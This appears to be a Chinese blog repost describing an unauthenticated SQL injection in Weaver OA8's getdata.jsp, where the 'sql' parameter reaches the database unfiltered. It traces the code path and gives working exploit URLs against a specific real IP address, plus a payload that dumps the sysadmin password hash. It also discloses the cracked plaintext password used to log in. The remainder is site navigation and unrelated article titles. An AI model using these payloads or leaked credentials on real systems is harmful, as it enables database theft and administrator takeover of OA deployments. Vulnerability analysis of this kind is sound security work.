当前位置:网站首页>范伟OA8前台SQL注入
范伟OA8前台SQL注入
2022-06-09 19:18:00 【Beluga】
漏洞URL:
http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=***注入点
在getdata.jsp中,直接将request对象交给
weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) :
方法处理
在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法
Proc方法4个参数,(“空字符串”,”cmd参数值”,request对象,serverContext对象)
在proc方法中,对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds(sql,type)方法中
在getSelectAllIds(sql,type)方法中,直接将sql参数的值,传递进数据库执行,并判断type的值是否等于5,如果等于5,获取查询结果的requestId字段,否则获取查询结果的id字段
到此,参数从URL,一直到数据库被执行
根据以上代码流程,只要构造请求参数
?cmd= getSelectAllId&sql=select password as id from userinfo;
即可完成对数据库操控
在浏览器中,构造测试URL:
http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%201234%20as%20id
页面显示1234
使用payload:
Select password as id from HrmResourceManager
查询HrmResourceManager表中的password字段,页面中返回了数据库第一条记录的值(sysadmin用户的password)
对密文进行md5对比:
使用sysadmin 123450aA.登录系统
边栏推荐
- MongoDB数据库条件查询技巧总结
- 又是一年高考季,转眼间已经过去12年了
- 使用nvm下载安装Node
- Have you established an internal wiki?
- 如何生成二维码图片(添加中文标识),并保存到指定的图片静态服务地址,解决二维码汉字不存在得问题。
- In the first quarter, 68.2 million TWS earphones were shipped worldwide: Apple ranked first and Xiaomi ranked third
- 同花顺股票开户怎么样?开户安全吗?
- Fedformer:Frequency Enhanced DecomposedTransformer for long-term series forecasting[还在学习中···]
- 国联期货开户安全吗?国联期货公司开户方法是什么?
- TPAMI2022 | 基于对抗性神经表示学习的异构域适应:电子商务与网络安全实验
猜你喜欢
Troubleshooting cl210openstack operations -- diagnosing openstack problems
CL210OpenStack操作的故障排除--诊断OpenStack问题
Implementation method of redis generating global unique ID
Hu Jie, former senior economist of the Federal Reserve: future financial trends from the upgrading of usdd
IEDA 安装actiBPM插件
Using fingerprint for windows two factor identity authentication is both safe and convenient
Node版本切换
windows下mysql 8.0.27 安装配置图文教程
Fast finding the number of nodes in a complete binary tree
押宝云原生,Ampere Computing打响服务器芯片变革关键一枪
随机推荐
【时序】TFT:具有可解释性的时间序列多步直接预测 Transformers[学习中...,亟待解决]
Meinong bio is about to be listed: its operation has been relatively stable in the past three years, and it is estimated that the over raised amount is about 100million yuan
MongoDB数据库条件查询技巧总结
How to answer makes the interviewer speechless
In the first quarter, the global PC GPU shipment fell by 6.2%, and the epidemic created a lot of demand, which ended
Simple dialogue system - Overview
Hash table distributed hash table (DHT) hash table
What physical stores will be more profitable in 2022? A small cost shop suitable for women, yeqifang is healthy
金鱼哥RHCA回忆录:DO447管理清单--章节实验
紫光展锐手机芯片被曝有严重安全漏洞,全球约10%安卓手机或受影响
一季度全球TWS耳机出货6820万部:苹果份额第一,小米第三
最长有效括号的问题
windows下mysql 8.0.27 安装配置图文教程
5 longest palindrome substring (interval DP)
155_ Model_ Safety stock of power Bi & power pivot purchase, sales and inventory
尽一份孝心,为家人做一个老人防摔报警系统
搭建TypeScript开发环境
10个常见触发IO瓶颈的高频业务场景
[resource sharing] comprehensive navigation website
mtb12_PearsonR_correlAtion coefficient_heatmap_Distribution Bin_Clean Step类型转换慎_spatial dist_改变para值